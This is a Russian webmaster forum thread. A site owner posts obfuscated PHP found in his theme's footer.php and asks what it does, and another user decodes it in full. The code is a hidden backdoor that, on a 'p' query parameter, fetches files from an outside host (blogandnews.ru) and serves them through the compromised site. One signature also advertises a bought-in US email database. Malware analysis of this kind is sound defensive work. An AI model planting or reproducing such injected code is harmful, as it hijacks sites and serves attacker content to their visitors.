Форум Сайтостроение Веб-строительство

Вот такие криптовки в footer.php

Oshparennij
На сайте с 14.01.2008
Offline
174
Oshparennij
529

Лазил по сайту. Точнее по файлам. обнаружил вот такой код в footer.php 

<? $GLOBALS['_230821625_']=Array(base64_decode('' .'c' .'3Ryc3Ry'),base64_decode('a' .'GV' .'h' .'ZG' .'Vy'),base64_decode('c3Ryc3Ry'),base64_decode('' .'a' .'GVhZ' .'GVy'),base64_decode('c3Ryc' .'3Ry'),base64_decode('c3Ryc3Ry'),base64_decode('aGVhZGVy'),base64_decode('c' .'3Ryc3' .'Ry'),base64_decode('' .'aGVhZGVy'),base64_decode('aG' .'V' .'hZGV' .'y'),base64_decode('c' .'3R' .'ycG' .'9' .'z'),base64_decode('c3RyX3J' .'lcGx' .'hY' .'2U='),base64_decode('' .'Y' .'3VybF' .'9pbml0'),base64_decode('Y' .'3VybF9z' .'ZX' .'R' .'vcHQ='),base64_decode('Y' .'3' .'Vyb' .'F9zZXRv' .'cHQ='),base64_decode('Y' .'3Vyb' .'F9leGVj'),base64_decode('Y3V' .'y' .'bF9j' .'bG9z' .'Z' .'Q=' .'='),base64_decode('ZnNvY2' .'tvcGVu'),base64_decode('ZndyaXRl'),base64_decode('ZmVvZg=='),base64_decode('Z' .'mdldHM='),base64_decode('' .'ZXhwbG' .'9kZQ=='),base64_decode('ZmNsb3Nl')); ?><? function _2107249321($i){$a=Array('LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD11dGYtOA==','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTg=','cA==','YmxvZ2FuZG5ld3MucnU=','L2NhY2hlLw==','SFRUUF9IT1NU','Lw==','ZGwt','Lmpz','Lmpz','Lmpz','','','LnBocA==','','','aHR0cDovLw==','R0VUIA==','IEhUVFAvMS4xDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQoNCg==');return base64_decode($a[$i]);} ?><?php if($GLOBALS['_230821625_'][0]($_0,_2107249321(0))){$GLOBALS['_230821625_'][1](_2107249321(1));}elseif($GLOBALS['_230821625_'][2]($_0,_2107249321(2))){$GLOBALS['_230821625_'][3](_2107249321(3));}elseif($GLOBALS['_230821625_'][4]($_0,_2107249321(4))|| $GLOBALS['_230821625_'][5]($_0,_2107249321(5))){$GLOBALS['_230821625_'][6](_2107249321(6));}elseif($GLOBALS['_230821625_'][7]($_0,_2107249321(7))){$GLOBALS['_230821625_'][8](_2107249321(8));}else{$GLOBALS['_230821625_'][9](_2107249321(9));}$_1=_2107249321(10);$_2=_2107249321(11);$_3=_2107249321(12);$_4=$_SERVER[_2107249321(13)] ._2107249321(14) ._2107249321(15);if(isset($_GET[$_1])){$_5=$_GET[$_1];if($GLOBALS['_230821625_'][10]($_5,_2107249321(16))!== false){$_6=_2107249321(17);$_5=$GLOBALS['_230821625_'][11](_2107249321(18),_2107249321(19),$_5);$_4=_2107249321(20);}else{$_6=_2107249321(21);}$_7=_2107249321(22);$_8=_2107249321(23);if($_9=$GLOBALS['_230821625_'][12]()){$GLOBALS['_230821625_'][13]($_9,CURLOPT_URL,_2107249321(24) .$_2 .$_3 .$_4 .$_5 .$_6);$GLOBALS['_230821625_'][14]($_9,CURLOPT_RETURNTRANSFER,true);$_7=$GLOBALS['_230821625_'][15]($_9);$GLOBALS['_230821625_'][16]($_9);}else{$_10=$GLOBALS['_230821625_'][17]($_2,80,$_11,$_12,30);if($_10){$_7=_2107249321(25) .$_3 .$_4 .$_5 .$_6 ._2107249321(26);$_7 .= _2107249321(27) .$_2 ._2107249321(28);$_7 .= _2107249321(29);$GLOBALS['_230821625_'][18]($_10,$_7);while(!$GLOBALS['_230821625_'][19]($_10)){$_8.=$GLOBALS['_230821625_'][20]($_10,128);}$_13=$GLOBALS['_230821625_'][21](_2107249321(30),$_8,2);$_7=$_13[1];$GLOBALS['_230821625_'][22]($_10);}}echo $_7;exit;} ?>

Вроде ничего опасного на сайте нет, ни доров ничего. Хотел раскриптовать, что только не пробовал - не получилось. Может кто-нибудь такое раскодировать?

Заранее спасибо. Уже неделю мучаюсь вопросом, что за...

Продам базу email (usa), валид 99%. Пишите в личку.
siv1987
На сайте с 02.04.2009
Offline
427
siv1987
#1 


if(strstr($_0,".css")){header("Content-Type: text/css; charset=utf-8");}elseif(strstr($_0,".png")){header("Content-Type: image/png");}elseif(strstr($_0,".jpg")|| strstr($_0,".jpeg")){header("Content-Type: image/jpeg");}elseif(strstr($_0,".gif")){header("Content-Type: image/gif");}else{header("Content-Type: text/html; charset=utf-8");}$_1="p";$_2="blogandnews.ru";$_3="/cache/";$_4=$_SERVER["HTTP_HOST"] ."/" ."dl-";if(isset($_GET[$_1])){$_5=$_GET[$_1];if(strpos($_5,".js")!== false){$_6=".js";$_5=str_replace(".js","",$_5);$_4="";}else{$_6=".php";}$_7="";$_8="";if($_9=curl_init()){curl_setopt($_9,CURLOPT_URL,"http://" .$_2 .$_3 .$_4 .$_5 .$_6);curl_setopt($_9,CURLOPT_RETURNTRANSFER,true);$_7=curl_exec($_9);curl_close($_9);}else{$_10=fsockopen($_2,80,$_11,$_12,30);if($_10){$_7="GET " .$_3 .$_4 .$_5 .$_6 ." HTTP/1.1

";$_7 .= "Host: " .$_2 ."

";$_7 .= "Connection: Close



";fwrite($_10,$_7);while(!feof($_10)){$_8.=fgets($_10,128);}$_13=explode("



",$_8,2);$_7=$_13[1];fclose($_10);}}echo $_7;exit;}



if (strstr($_0, ".css")) {

	header("Content-Type: text/css; charset=utf-8");

}

elseif (strstr($_0, ".png")) {

	header("Content-Type: image/png");

}

elseif (strstr($_0, ".jpg") || strstr($_0, ".jpeg")) {

	header("Content-Type: image/jpeg");

}

elseif (strstr($_0, ".gif")) {

	header("Content-Type: image/gif");

}

else {

	header("Content-Type: text/html; charset=utf-8");

}



$_1 = "p";

$_2 = "blogandnews.ru";

$_3 = "/cache/";

$_4 = $_SERVER["HTTP_HOST"] . "/" . "dl-";



if (isset($_GET[$_1])) {

	$_5 = $_GET[$_1];

	if (strpos($_5, ".js") !== false) {

		$_6 = ".js";

		$_5 = str_replace(".js", "", $_5);

		$_4 = "";

	}

	else {

		$_6 = ".php";

	}



	$_7 = "";

	$_8 = "";

	if ($_9 = curl_init()) {

		curl_setopt($_9, CURLOPT_URL, "http://" . $_2 . $_3 . $_4 . $_5 . $_6);

		curl_setopt($_9, CURLOPT_RETURNTRANSFER, true);

		$_7 = curl_exec($_9);

		curl_close($_9);

	}

	else {

		$_10 = fsockopen($_2, 80, $_11, $_12, 30);

		if ($_10) {

			$_7 = "GET " . $_3 . $_4 . $_5 . $_6 . " HTTP/1.1

";

			$_7.= "Host: " . $_2 . "

";

			$_7.= "Connection: Close



";

			fwrite($_10, $_7);

			while (!feof($_10)) {

				$_8.= fgets($_10, 128);

			}



			$_13 = explode("



", $_8, 2);

			$_7 = $_13[1];

			fclose($_10);

		}

	}



	echo $_7;

	exit;

}
Oshparennij
На сайте с 14.01.2008
Offline
174
Oshparennij
#2

Большое спасибо.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий